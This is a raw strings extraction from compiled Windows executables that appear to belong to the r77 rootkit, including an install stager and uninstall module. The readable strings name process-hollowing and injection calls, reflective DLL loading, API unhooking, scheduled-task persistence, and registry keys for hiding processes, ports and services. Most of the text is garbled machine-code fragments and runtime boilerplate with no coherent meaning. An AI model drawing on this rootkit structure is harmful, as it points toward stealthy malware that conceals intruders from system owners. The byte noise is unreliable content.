!This program cannot be run in DOS mode.
`.rsrc
@.reloc
(ZjX(
v2.0.50727
#Strings
get_Uninstall32
ReadInt32
WriteInt32
ToInt32
get_Uninstall64
ReadInt64
WriteInt64
ToInt64
ReadInt16
ToInt16
<Module>
CreateFileA
MODULEINFO
System.IO
mscorlib
get_Id
parentProcessId
processId
GetProcessById
NtResumeThread
NtGetContextThread
NtSetContextThread
thread
payload
NewGuid
shareMode
SizeOfImage
IDisposable
get_Handle
GetModuleHandle
RuntimeTypeHandle
CloseHandle
GetTypeFromHandle
inheritHandle
handle
templateFile
MapViewOfFile
Console
module
fileName
moduleName
applicationName
GetProcessesByName
ReadLine
commandLine
WriteLine
ValueType
allocationType
get_Culture
set_Culture
resourceCulture
Dispose
Allocate
EditorBrowsableState
UpdateProcThreadAttribute
CompilerGeneratedAttribute
GeneratedCodeAttribute
UnverifiableCodeAttribute
DebuggerNonUserCodeAttribute
DebuggableAttribute
EditorBrowsableAttribute
SecurityPermissionAttribute
CompilationRelaxationsAttribute
RuntimeCompatibilityAttribute
attribute
ReadByte
previousValue
InstallStager.exe
get_Size
returnSize
CreateFileMapping
ToString
maximumSizeHigh
fileOffsetHigh
Unhook
AllocHGlobal
Marshal
System.ComponentModel
BaseOfDll
UnhookDll
kernel32.dll
psapi.dll
ntdll.dll
msvcrt.dll
CopyStream
stream
Program
Is64BitOperatingSystem
resourceMan
bytesWritten
get_OSVersion
get_Version
GetModuleInformation
processInformation
destination
System.Globalization
SecurityAction
NtUnmapViewOfSection
System.Reflection
creationDisposition
Exception
moduleInfo
CultureInfo
startupInfo
numberOfBytesToMap
Buffer
buffer
get_ResourceManager
InstallStager
System.CodeDom.Compiler
Helper
BitConverter
get_Major
WriteIntPtr
System.Diagnostics
System.Runtime.InteropServices
System.Runtime.CompilerServices
System.Resources
InstallStager.Properties.Resources.resources
DebuggingModes
InstallStager.Properties
inheritHandles
threadAttributes
flagsAndAttributes
fileMappingAttributes
processAttributes
securityAttributes
ReadAllBytes
GetBytes
creationFlags
System.Security.Permissions
desiredAccess
access
IsWow64Process
wow64Process
CreateProcess
hProcess
OpenProcess
GetCurrentProcess
process
baseAddress
address
zeroBits
Concat
fileMappingObject
GetObject
oldProtect
VirtualProtect
newProtect
protect
op_Explicit
Environment
environment
EntryPoint
suspendCount
attributeCount
InitializeProcThreadAttributeList
attributeList
context
maximumSizeLow
fileOffsetLow
get_Assembly
memcpy
BlockCopy
FreeLibrary
NtAllocateVirtualMemory
NtWriteVirtualMemory
currentDirectory
op_Equality
op_Inequality
System.Security
System.Security.Permissions.SecurityPermissionAttribute, mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
SkipVerification
WrapNonExceptionThrows
3System.Resources.Tools.StronglyTypedResourceBuilder
16.0.0.0
lSystem.Resources.ResourceReader, mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
PADPADP=
!This program cannot be run in DOS mode.
.textbss-
`.rdata
@.data
.idata
@.msvcjmcH
.00cfg
@.rsrc
@.reloc
bytesWritten
returnValue
bytesRead
processId
securityAttributes
explicitAccess
everyoneSid
authority
persistFile
triggerDetails
trigger
triggerId
taskScheduler
fileName
tempPath
taskScheduler
r77ProcessCount
thread
r77ProcessCount
tokenPrivileges
processInformation
startupInfo
tokenSize
sidType
domainLength
domain
tokenSize
moduleBytes
moduleCount
processCount
bytesRead
returnValue
bytesWritten
is64Bit
exitCode
thread
integrityLevel
breakOnTermination
is64Bit
securityDescriptorSize
securityDescriptor
valueSize
valueNameLength
valueName
udpKey
tcpRemoteKey
tcpLocalKey
serviceNameKey
pathKey
processNameKey
pidKey
startupKey
valueSize
valueNameLength
valueName
currendProcessCount
bytesRead
taskScheduler
r77ProcessCount
oldProtect
moduleInfo
subKeyNameLength
subKeyName
bytesWritten
uninstall64Path
uninstall64Size
uninstall64
9:~IS3
93~AW3
u,hlSR
WuyWWh
URPQQh
t/j hl
jPhhTR
j@h,TR
j@h,TR
UQPXY]Y[
u#h,%P
u#h(#P
t hxAR
jphh'P
jphh'P
u&hX(P
PhD*P
t&h0NP
t&h`OP
t&hhFP
u&hdSP
u&hdSP
u&hXTP
u&hdSP
u&h0RP
u&hDWP
u&hDWP
u#h8ZP
u#h8ZP
u#hX[P
u&h`jP
u&hPmP
u&h`jP
u&hPmP
u&h`jP
u&hPmP
u&h`jP
u&hPmP
u&h`jP
u&hPmP
u&h`jP
u&hPmP
u&h`jP
u&hPmP
u&h`jP
u&hPmP
u&h`jP
u&hPmP
u&h`jP
u&hPmP
u&h`jP
u&hPmP
u&h`jP
u&hPmP
P$+Q8+U
P$+Q8+U
P$+Q8+U
P$+Q8+U
P$+Q8+U
P$+Q8+U
J$+H8+M
J$+H8+M
J$+H8+M
J$+H8+M
J$+H8+M
J$+H8+M
u&hXeP
;H8te3
;H8te3
;H8te3
;H8te3
;H8te3
;H8te3
u#hd/Q
u#h80Q
u#h80Q
u#h8ZP
u&h(3Q
u&h(3Q
u&h(3Q
u&h(3Q
u&h`dQ
u&h eQ
u#hleQ
u#h8ZP
u#hX[P
u&h8ZP
u#hPlQ
f9:t!V
|%h mQ
|%h mQ
Vj1hhnQ
jBhpmQ
Vj1hhnQ
PjBhpmQ
t#hhpQ
t#hhpQ
t#hhpQ
u&hPsQ
w&h<tQ
jQh|tQ
jWh|tQ
jbh|tQ
j`hxuQ
jlhxuQ
jxhxuQ
jUhxvQ
jthPwQ
u#h8ZP
u#hX[P
jQhlyQ
Qj@h@|Q
u?h fR
u#hXeP
u3j]h8
u&h8ZP
PPPPPPPP
u#h(#P
u#h(#P
u#hPsQ
u#hPsQ
u#h(#P
u&hPsQ
u&hPsQ
u#h(#P
ReflectiveDllMain
NtQueryObject
ntdll.dll
NtCreateThreadEx
Unknown exception
bad allocation
bad array new length
Stack around the variable '
' was corrupted.
The variable '
' is being used without being initialized.
The value of ESP was not properly saved across a function call. This is usually a result of calling a function declared with one calling convention with a function pointer declared with a different calling convention.
A cast to a smaller data type has caused a loss of data. If this was intentional, you should mask the source of the cast with the appropriate bitmask. For example:
char c = (i & 0xFF);
Changing the code in this way will not affect the quality of the resulting optimized code.
Stack memory was corrupted
A local variable was used before it was initialized
Stack memory around _alloca was corrupted
Unknown Runtime Check Error
Unknown Filename
Unknown Module Name
Run-Time Check Failure #%d - %s
Stack corrupted near unknown variable
Stack area around _alloca memory reserved by this function is corrupted
Data: <
Allocation number within this function:
Size:
Address: 0x
Stack area around _alloca memory reserved by this function is corrupted
%s%s%p%s%zd%s%d%s%s%s%s%s
A variable is being used without being initialized.
Stack pointer corruption
Cast to smaller type causing loss of data
Stack memory corruption
Local variable used before initialization
Stack around _alloca corrupted
RegOpenKeyExW
RegQueryValueExW
RegCloseKey
PDBOpenValidate5
d:\agent\_work\3\s\src\vctools\crt\vcruntime\src\eh\std_type_info.cpp
d:\agent\_work\3\s\src\vctools\crt\vcruntime\src\internal\per_thread_data.cpp
__based(
__cdecl
__pascal
__stdcall
__thiscall
__fastcall
__vectorcall
__clrcall
__eabi
__swift_1
__swift_2
__ptr64
__restrict
__unaligned
restrict(
delete
operator
`vftable'
`vbtable'
`vcall'
`typeof'
`local static guard'
`string'
`vbase destructor'
`vector deleting destructor'
`default constructor closure'
`scalar deleting destructor'
`vector constructor iterator'
`vector destructor iterator'
`vector vbase constructor iterator'
`virtual displacement map'
`eh vector constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`copy constructor closure'
`udt returning'
`local vftable'
`local vftable constructor closure'
new[]
delete[]
`omni callsig'
`placement delete closure'
`placement delete[] closure'
`managed vector constructor iterator'
`managed vector destructor iterator'
`eh vector copy constructor iterator'
`eh vector vbase copy constructor iterator'
`dynamic initializer for '
`dynamic atexit destructor for '
`vector copy constructor iterator'
`vector vbase copy constructor iterator'
`managed vector copy constructor iterator'
`local static thread guard'
operator ""
operator co_await
operator<=>
Type Descriptor'
Base Class Descriptor at (
Base Class Array'
Class Hierarchy Descriptor'
Complete Object Locator'
`anonymous namespace'
template-parameter-
`template-parameter-
generic-type-
`generic-type-
`non-type-template-parameter
`template-type-parameter-
`generic-class-parameter-
`generic-method-parameter-
`template-parameter
`vtordispex{
`vtordisp{
`adjustor{
`local static destructor helper'
`template static data member constructor helper'
`template static data member destructor helper'
static
virtual
private:
protected:
public:
[thunk]:
extern "C"
short
unsigned
volatile
volatile
std::nullptr_t
std::nullptr_t
<ellipsis>
,<ellipsis>
noexcept
double
__int8
__int16
__int32
__int64
__int128
<unknown>
char8_t
char16_t
char32_t
wchar_t
__w64
UNKNOWN
signed
volatile
`unknown ecsu'
union
struct
class
coclass
cointerface
const
cli::array<
cli::pin_ptr<
{flat}
Cannot access value of empty optional
d:\agent\_work\3\s\src\vctools\crt\github\stl\inc\optional
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
InitializeCriticalSectionEx
bad exception
<program name unknown>
minkernel\crts\ucrt\src\appcrt\misc\dbgrpt.cpp
minkernel\crts\ucrt\src\appcrt\startup\argv_parsing.cpp
minkernel\crts\ucrt\src\desktopcrt\env\environment_initialization.cpp
CorExitProcess
!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
minkernel\crts\ucrt\src\appcrt\locale\wsetlocale.cpp
Normal
Ignore
Client
Client hook allocation failure at file %hs line %d.
Client hook allocation failure.
Error: memory allocation: bad memory block type.
Client hook re-allocation failure at file %hs line %d.
Client hook re-allocation failure.
Error: memory allocation: bad memory block type.
Memory allocated at %hs(%d).
The Block at 0x%p was allocated by aligned routines, use _aligned_realloc()
Error: possible heap corruption at or near 0x%p
The Block at 0x%p was allocated by aligned routines, use _aligned_free()
Client hook free failure.
HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.
CRT detected that the application wrote to memory before start of heap buffer.
Memory allocated at %hs(%d).
HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.
CRT detected that the application wrote to memory before start of heap buffer.
HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.
CRT detected that the application wrote to memory after end of heap buffer.
Memory allocated at %hs(%d).
HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.
CRT detected that the application wrote to memory after end of heap buffer.
DAMAGED
HEAP CORRUPTION DETECTED: on top of Free block at 0x%p.
CRT detected that the application wrote to a heap buffer that was freed.
Memory allocated at %hs(%d).
HEAP CORRUPTION DETECTED: on top of Free block at 0x%p.
CRT detected that the application wrote to a heap buffer that was freed.
%hs located at 0x%p is %Iu bytes long.
Memory allocated at %hs(%d).
%hs located at 0x%p is %Iu bytes long.
Cycle in block list detected while processing block located at 0x%p.
Heap validation failed.
Bad memory block found at 0x%p.
Memory allocated at %hs(%d).
Bad memory block found at 0x%p.
Data: <%s> %s
Dumping objects ->
#File Error#(%d) :
%hs(%d) :
{%ld}
client block at 0x%p, subtype %x, %Iu bytes long.
normal block at 0x%p, %Iu bytes long.
crt block at 0x%p, subtype %x, %Iu bytes long.
Object dump complete.
Detected memory leaks!
%Id bytes in %Id %hs Blocks.
Largest number used: %Id bytes.
Total allocations: %Id bytes.
The block at 0x%p was not allocated by _aligned routines, use realloc()
Damage before 0x%p which was allocated by aligned routine
The block at 0x%p was not allocated by _aligned routines, use free()
(null)
minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h
minkernel\crts\ucrt\src\appcrt\startup\onexit.cpp
minkernel\crts\ucrt\src\appcrt\internal\per_thread_data.cpp
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
!"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
AreFileApisANSI
CompareStringEx
EnumSystemLocalesEx
GetActiveWindow
GetDateFormatEx
GetEnabledXStateFeatures
GetLastActivePopup
GetLocaleInfoEx
GetProcessWindowStation
GetSystemTimePreciseAsFileTime
GetTimeFormatEx
GetUserDefaultLocaleName
GetUserObjectInformationW
GetXStateFeaturesMask
IsValidLocaleName
LCMapStringEx
LCIDToLocaleName
LocaleNameToLCID
LocateXStateFeature
MessageBoxA
MessageBoxW
RoInitialize
RoUninitialize
AppPolicyGetProcessTerminationMethod
AppPolicyGetThreadInitializationType
AppPolicyGetShowDeveloperDiagnostic
AppPolicyGetWindowingModel
SetThreadStackGuarantee
SystemFunction036
Second Chance Assertion Failed: File
<file unknown>
, Line
_CrtDbgReport: String too long or IO Error
Assertion failed:
Assertion failed!
%s(%d) : %s
_CrtDbgReport: String too long or Invalid characters in String
minkernel\crts\ucrt\src\appcrt\misc\signal.cpp
minkernel\crts\ucrt\inc\corecrt_internal_win32_buffer.h
minkernel\crts\ucrt\src\appcrt\startup\argv_wildcards.cpp
minkernel\crts\ucrt\src\appcrt\mbstring\mbctype.cpp
minkernel\crts\ucrt\src\desktopcrt\env\get_environment_from_os.cpp
minkernel\crts\ucrt\src\desktopcrt\env\setenv.cpp
minkernel\crts\ucrt\src\appcrt\lowio\osfinfo.cpp
minkernel\crts\ucrt\src\appcrt\locale\initctype.cpp
minkernel\crts\ucrt\src\appcrt\locale\initmon.cpp
minkernel\crts\ucrt\src\appcrt\locale\initnum.cpp
minkernel\crts\ucrt\src\appcrt\locale\inittime.cpp
minkernel\crts\ucrt\src\appcrt\locale\getstringtypea.cpp
NAN(SNAN)
nan(snan)
NAN(IND)
nan(ind)
minkernel\crts\ucrt\src\appcrt\stdio\_file.cpp
minkernel\crts\ucrt\src\appcrt\stdio\_sftbuf.cpp
minkernel\crts\ucrt\src\appcrt\locale\lcmapstringa.cpp
minkernel\crts\ucrt\src\appcrt\locale\getlocaleinfoa.cpp
[aOni*{
~ $s%r
@b;zO]
v2!L.2
1#QNAN
1#SNAN
minkernel\crts\ucrt\src\appcrt\locale\comparestringa.cpp
minkernel\crts\ucrt\src\appcrt\stdio\_getbuf.cpp
minkernel\crts\ucrt\src\appcrt\lowio\read.cpp
minkernel\crts\ucrt\src\appcrt\stdio\stream.cpp
?5Wg4p
%S#[k =
"B <1=
_hypot
_nextafter
C:\Users\maxim\Desktop\project windows + android\rootkit\r77-rootkit-master\r77-rootkit-master\vs\Debug\Uninstall.pdb
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
.?AVbad_alloc@std@@
.?AVexception@std@@
.?AVbad_array_new_length@std@@
.?AVbad_exception@std@@
.?AVtype_info@@
.?AVDNameNode@@
.?AVcharNode@@
.?AVpcharNode@@
.?AVpDNameNode@@
.?AVDNameStatusNode@@
.?AVpairNode@@
CreateFileW
DeleteFileW
GetFileSize
GetFinalPathNameByHandleW
ReadFile
WriteFile
GetTempPathW
CloseHandle
GetLastError
ConnectNamedPipe
DisconnectNamedPipe
CreateNamedPipeW
WaitForSingleObject
GetCurrentProcess
GetCurrentProcessId
TerminateProcess
CreateThread
GetExitCodeThread
CreateProcessW
OpenProcess
VirtualProtect
VirtualAllocEx
ReadProcessMemory
WriteProcessMemory
CreateFileMappingW
MapViewOfFile
IsWow64Process
FreeLibrary
GetModuleHandleA
GetModuleHandleW
GetProcAddress
LoadResource
LockResource
SizeofResource
LocalAlloc
LocalFree
lstrcmpW
lstrcmpiA
lstrcmpiW
lstrcpyW
lstrcatW
lstrlenW
FindResourceA
WideCharToMultiByte
K32EnumProcesses
K32EnumProcessModules
K32GetModuleFileNameExW
K32GetModuleInformation
KERNEL32.dll
OpenProcessToken
AdjustTokenPrivileges
AllocateAndInitializeSid
GetSidSubAuthority
GetSidSubAuthorityCount
GetTokenInformation
InitializeSecurityDescriptor
SetSecurityDescriptorDacl
LookupAccountSidW
LookupPrivilegeValueW
RegCloseKey
RegCreateKeyExW
RegDeleteKeyW
RegDeleteKeyExW
RegEnumKeyExW
RegEnumValueW
RegOpenKeyExW
RegQueryInfoKeyW
RegSetKeySecurity
SetEntriesInAclW
ConvertStringSecurityDescriptorToSecurityDescriptorW
RegDeleteValueW
ADVAPI32.dll
CoUninitialize
CoCreateInstance
CoInitialize
ole32.dll
NtQueryInformationProcess
ntdll.dll
PathCombineW
PathFindFileNameW
SHLWAPI.dll
GetCurrentThreadId
IsDebuggerPresent
RaiseException
MultiByteToWideChar
UnhandledExceptionFilter
SetUnhandledExceptionFilter
IsProcessorFeaturePresent
QueryPerformanceCounter
GetSystemTimeAsFileTime
InitializeSListHead
GetStartupInfoW
HeapAlloc
HeapFree
GetProcessHeap
VirtualQuery
InterlockedPushEntrySList
InterlockedFlushSList
GetModuleFileNameW
LoadLibraryExW
RtlUnwind
SetLastError
EnterCriticalSection
LeaveCriticalSection
DeleteCriticalSection
InitializeCriticalSectionAndSpinCount
TlsAlloc
TlsGetValue
TlsSetValue
TlsFree
EncodePointer
GetModuleHandleExW
GetStdHandle
ExitProcess
HeapValidate
GetSystemInfo
GetCurrentThread
GetDateFormatW
GetTimeFormatW
CompareStringW
LCMapStringW
GetLocaleInfoW
IsValidLocale
GetUserDefaultLCID
EnumSystemLocalesW
GetFileType
OutputDebugStringW
WriteConsoleW
SetConsoleCtrlHandler
FindClose
FindFirstFileExW
FindNextFileW
IsValidCodePage
GetACP
GetOEMCP
GetCPInfo
GetCommandLineA
GetCommandLineW
GetEnvironmentStringsW
FreeEnvironmentStringsW
SetEnvironmentVariableW
SetStdHandle
GetStringTypeW
HeapReAlloc
HeapSize
HeapQueryInformation
GetFileSizeEx
SetFilePointerEx
GetConsoleOutputCP
GetConsoleMode
FlushFileBuffers
DecodePointer
ReadConsoleW
!This program cannot be run in DOS mode.
.textbssvO
`.rdata
@.data
.pdata
@.idata
@.msvcjmcH
.00cfg
@_RDATA
@.rsrc
@.reloc
E$9EDs2
ED9EdsM
E$9EDsl
D$pHc@
D$8HcD$ H
@UVWAVH
VATAUAWH
(A_A]A\^
@SUWATAUAVAWH
A_A^A]A\_][
D$H9D$ s"
H9D$Hr
H9D$Hs
$Hc@<H
D$ H9D$(u
H3D$0H
H9D$ u
D$ Hc@<H
H;D$@v
D$PfA9
fD9TDPt
USVWATAUAVH
u+L95.
te+}o;>r^
A^A]A\_^[]
5Genu
5Auth
ffffff
fffffff
H9D$Xrd
H9D$XsL
H9D$Xu
D$8H9D$0u
D$(Hc@
L$(HcI
D$(Hc@
|$ RCC
|$ MOC
|$ csm
D$@Hc@
H9D$(r
H9D$(v
H9D$(r
H9D$(v
H9D$0u
(HcD$0Hk
(HcD$0Hk
HcD$PE3
HcD$PE3
D$,9D$0t$H
HcD$@H
HcD$ H
t)HcD$hHk
DHcD$hHk
|$ Zt$
|$ 2tC
|$ 5tX
HcD$DH
HcD$LH
HcD$HH
H;D$(r
D$(H9D$8s
H9D$8r
|$X@t
|$0Xt)
HcD$ H
HcD$ H
|$ Btu
|$ )uyH
L$XH9H
H+D$XH
HcD$@H
HcD$DH
HcD$8H
HcD$8Hk
|$$0t1
|$H0t2
HcD$<H
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
&&&&&&&
!"#$&&&&%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
!%"#%%%%%$'t
|$0Bt,
HcD$4H
HcD$8H
D$PHcD$PE3
t.HcD$PH
H9D$ sNH
hHcD$xHk
|$ @u&H
D$ 9D$X~
HcD$XH
|$$$td
|$$Ut0
|$$Vt=
|$$Zt/
HcD$0H
|$$FtD
|$$Ht\
|$$It/
|$(Rt"
HcD$PH
HcD$TH
HcD$0H
|$$3tD
|$$4tg
|$@@t?H
D$HH9D$ t"H
H9D$8u
H9D$@t:H
D$0H9D$Ht:H
D$0H9D$Ht:H
L$@HcI
D$(9D$ s6H
D$x9D$,u
D$pHc@
D$0Hc@
L$8HcD
H;D$Ht
9D$ s(
L$8HcD
D$,9D$
@XH9D$@s
@XH9D$@u
D$ H9D$@u
D$@Hc@
D$@Hc@
D$PHc@
D$PHc@
D$PHc@
D$@Hc@
D$$9D$ sAH
D$@Hc@
H9D$Ps
D$@Hc@
D$,9D$ s?H
H9D$`s
D$pHc@
L$xHcI
L$xHcI
L$xHcI
L$xHcI
L$xH9A
L$`HcI
L$`HcI
L$xH9A
L$`HcI
L$`HcI
L$pHcI
L$pHcI
L$pHcI
L$xHcI
H9D$8tl
L$xHcI
L$pHcI
L$pHcI
L$pHcI
L$pHcI
L$xHcI
H9D$8tl
L$xHcI
L$pHcI
D$xHc@
I(H9H(u
HcL$ HcD
HcL$ HcD
9D$ ~/D
L$hHcI
HcL$$Hk
L$PHcI
HcL$ Hk
L$PHcI
HcL$ Hk
L$@HcI H
9D$$}Z
D$x9D$$u
D$H9D$ s
D$ i@(
H9D$H~
H9D$H~
H9D$@toH
H9D$@toH
D$H9D$@t
D$P9D$@t
|$0csm
D$XH9D$@t
D$`H9D$0t!H
H9D$pr
H9D$xr
H+D$@H;D$8w
x ATAVAWH
0A_A^A\
x ATAVAWH
fA94@u
fA94nu
0A_A^A\
D$HH9D$ t'H
D$XH9D$(t8H
D$ Hc@<H
HcD$`H
H9D$ t
|$8@sbH
|$8@s[
D$HH9D$@t'H
L$0H9A
D$p9D$0
D$0HcD$0Hk
HcL$0Hk
HcL$0Hk
HcD$0Hk
HcD$0Hk
H9D$@u
HcD$0Hk
D$T9D$@
HcD$@H
t6HcD$@H
HcD$@H
<HcD$@H
HcD$@H
D$T9D$@
D$PHcD$PH
s!HcD$P
HcL$Pf
D$`HkD$8
D$HH9D$ s'
D$HH9D$ s'
D$`H9D$@
D$ H9D$8s
D$,HcD$,H
D$ HcD$,H
D$8H9D$ t"
D$XH9D$H
D$@HkL$H
D$XH9D$Ht:H
D$XH9D$Ht
D$HH9D$@u4H
L$(H9A t
HcD$0HcL$0H
HcL$0H
0HcD$0HcL$0H
HcL$0H
HcD$0H
HcD$0H
H+D$@H
H+D$`H
t$hH;D$ps
D$0H9D$8s*H
t$@H;D$Hs
HcL$0H
t$hH;D$ps
D$0H9D$8s*H
H9D$hs
H9D$xs
H9D$ps
H9D$Xs
H9D$hs
H9D$xs
H9D$Xs
H9D$hs
H9D$xs
H9D$pt
|:HcD$0H;
H9D$pu
H9D$puDH
H9D$pt
|:HcD$0H;
H9D$pu
H9D$puA3
H9D$pt
|:HcD$0H;
H9D$pu
H9D$puDH
H9D$pt
|:HcD$0H;
H9D$pu
H9D$puA3
H9D$pt
|:HcD$0H;
H9D$pu
H9D$puDH
H9D$pt
|:HcD$0H;
H9D$pu
H9D$puA3
H9D$Ps
H9D$`s
H9D$Ps
H9D$`s
H9D$Xv
H9D$(w
?H9D$Xv
H9D$(w
D$P9D$ }"L
D$P9D$ }&f
D$P9D$ }"L
D$P9D$ }&f
D$09D$4t
D$09D$4t
D$09D$4t
D$09D$4t
H9D$(s
H9D$(s
H9D$(s
H9D$(s
H9D$(s
H9D$(s
H9D$(s
H9D$(s
H9D$(s
H9D$(s
H9D$(s
H9D$(s
|$ t@
|$ #tJ
|$ +t!
|$ 0tF
|$ t@
|$ #tJ
|$ +t!
|$ 0tF
|$ t@
|$ #tJ
|$ +t!
|$ 0tF
|$ t@
|$ #tJ
|$ +t!
|$ 0tF
|$ t@
|$ #tJ
|$ +t!
|$ 0tF
|$ t@
|$ #tJ
|$ +t!
|$ 0tF
|$ t@
|$ #tJ
|$ +t!
|$ 0tF
|$ t@
|$ #tJ
|$ +t!
|$ 0tF
|$ t@
|$ #tJ
|$ +t!
|$ 0tF
|$ t@
|$ #tJ
|$ +t!
|$ 0tF
|$ t@
|$ #tJ
|$ +t!
|$ 0tF
|$ t@
|$ #tJ
|$ +t!
|$ 0tF
HcD$0H
HcD$0H
HcD$0H
HcD$0H
HcD$0H
HcD$0H
HcD$0H
HcD$0H
HcD$0H
HcD$0H
HcD$0H
HcD$0H
HcD$DH
HcD$DH
HcD$DH
HcD$DH
HcD$DH
HcD$DH
HcD$DH
HcD$DH
HcD$DH
HcD$DH
HcD$DH
HcD$DH
D$`Hc@(H
D$`Hc@(H
D$`Hc@(H
D$`Hc@(H
D$`Hc@(H
D$`Hc@(H
D$`Hc@(H
D$`Hc@(H
D$`Hc@(H
D$`Hc@(H
D$`Hc@(H
D$`Hc@(H
HcD$$H
HcD$$H
HcD$$H
HcD$$H
HcD$$H
HcD$$H
HcD$$H
HcD$$H
HcD$$H
HcD$$H
HcD$$H
HcD$$H
(HcD$8H
(HcD$8H
(HcD$8H
(HcD$8H
(HcD$8H
(HcD$8H
D$H9D$ }DH
D$H9D$ }DH
D$H9D$ }DH
D$H9D$ }DH
D$H9D$ }DH
D$H9D$ }DH
HcD$0Hk
#HcD$0Hk
HcD$0Hk
#HcD$0Hk
HcD$0Hk
#HcD$0Hk
HcD$0Hk
#HcD$0Hk
HcD$0Hk
#HcD$0Hk
HcD$0Hk
#HcD$0Hk
HcD$0Hk
#HcD$0Hk
HcD$0Hk
#HcD$0Hk
D$PH9D$@
D$PH9D$@
D$PH9D$@
D$PH9D$@
@P9D$4
@P9D$4
@P9D$4
@P9D$4
@P9D$4
@P9D$4
@P9D$4
HcD$8H
@P9D$4
HcD$8H
@P9D$4
HcD$8H
@P9D$4
HcD$8H
@P9D$4
HcD$8H
@P9D$4
HcD$8H
D$(HcD$`H9D$(s
HcD$`H
+HcD$`H9D$ t
D$(HcD$`H9D$(s
HcD$`H
+HcD$`H9D$ t
HcD$`H
D$(H9D$ tZH
HcD$`H
D$(H9D$ t\H
D$`H9D$H
D$PH9D$@rf
D$`H9D$ht
D$0H9D$(r
D$0H9D$(s
D$@H9D$`u
D$HH9D$ht(H
H9D$ t
H9D$8s
H9D$8s
D$8H9D$0r
D$8H9D$0r
D$8H9D$0r
D$8H9D$0r
D$8H9D$0r
D$8H9D$0r
H9D$hs
D$8H9D$0r
D$8H9D$0r
D$8H9D$0r
D$8H9D$0r
D$8H9D$0r
D$8H9D$0r
H9D$hs
HcD$$H
HcD$(H
HcD$,H
HcD$0H
HcD$$H
HcD$(H
HcD$,H
HcD$0H
D$L9D$P
D$T9D$X
D$\9D$`uPH
D$d9D$h
D$8H9D$@
H9H(w*
H9H8w*
H9H(w*
D$L9D$P
D$T9D$X
D$\9D$`uPH
D$d9D$h
D$8H9D$@
H9H(w*
H9H8w*
H9H(w*
D$L9D$P
D$T9D$X
D$\9D$`uPH
D$d9D$h
D$8H9D$@
H9H(w*
H9H8w*
H9H(w*
D$L9D$P
D$T9D$X
D$\9D$`uPH
D$d9D$h
D$8H9D$@
H9H(w*
H9H8w*
H9H(w*
H9D$ s
H9D$ s
H9D$hs
H9D$xs
H9D$8v
H9D$8v
D$P9D$8r
D$P9D$8u
D$\9D$@v
D$X9D$<r
D$X9D$<u
D$d9D$Hv
D$XH9D$@r!H
D$XH9D$@u
D$`H9D$Hr!H
D$`H9D$Hu
H9D$ u
D$HH9D$ t"H
H9D$8u
H9D$@t:H
D$0H9D$Ht:H
D$0H9D$Ht:H
D$8H9D$(t
D$8H9D$ t<H
(HcD$0Hk
(HcD$0Hk
HcD$PH
yHcD$PH
HcL$PH
HcL$PH
HcD$PH
HcD$`H
*HcD$`H
D$@HcD$`H
|$\Pta
H+D$PH
D$@H9D$8t
H+D$HH
D$@H9D$8t
H+D$PH
D$@H9D$8t
D$(H9D$ u
H9D$8v H
HcD$4H
H9D$ht
D$XH9D$0t$H
H9D$ps
H9D$ps
H9D$8v H
H9D$8v H
H9D$ht
H9D$`t
H9D$Hv
H9D$Hv
H9D$8t2H
H9D$8t L
H9D$pu(
H9D$8t2H
H9D$8t L
H9D$pu(
H9D$ t
H9D$ t
H9D$@v
H9D$@v
t$HiD$
t$HiD$
|$PArO
|$PZwH
|$ParO
|$PzwH
H9D$ thH
H9D$ t
9D$ w@
9D$ w(
D$hH9D$X
D$hH9D$Xr
fD94Fu
WATAUAVAWH
9t$htBH95U%
x}I96txI
0A_A^A]A\_
WATAUAVAWH
fB94`t
x~I96tyI
fC94wu
0A_A^A]A\_
WAVAWH
0A_A^_
fD94pt
D$09D$<t:H
D$09D$<t:H
D$09D$<t:H
D$XH9D$8
D$0HcD$0H
HcD$0H
D$0H9D$ t
9D$`|XH
HcD$ H
HcL$ H
HcD$ H
HcD$ H
D$HH9D$8
HHcD$PH
D$@HcD$(H
D$$9D$
HcD$$H
HcD$PH
HcD$PH
H9D$ t
H9D$xs
HcD$0H
t>HcD$0H
HcD$0H
HcD$ Hk
T$@H9L
(t/HcD$ Hk
HcD$ Hk
HcD$ Hk
t/HcD$ Hk
HcD$ Hk
HcD$0Hk
T$PH9L
(tmHcD$0Hk
HcD$0Hk
HcD$0Hk
HcD$0Hk
HcD$0Hk
ufHcD$0Hk
HcD$0Hk
HcD$0Hk
tQHcD$0Hk
HcD$0Hk
HcD$0Hk
H9D$0u
HcD$ Hk
T$@H9L
(t/HcD$ Hk
HcD$ Hk
HcD$ Hk
t/HcD$ Hk
HcD$ Hk
D$HH9D$ u
H9D$ t
D$0Hc@
D$H9D$(
D$$HcD$$Hk
HcD$$Hk
D$0Hc@
D$$9D$Pt1
D$H9D$$
D$ HcD$ Hk
u!HcD$ Hk
D$XH9D$Pw
H#D$ H
D$pH9D$`tAH
|$hd|IH
H+D$pH
HcL$DH
HcT$HH
HcD$HH
HcL$PH
|$8d|4
HcL$0H
9D$0ucH
HcD$0H
HcL$4H
HcD$<L
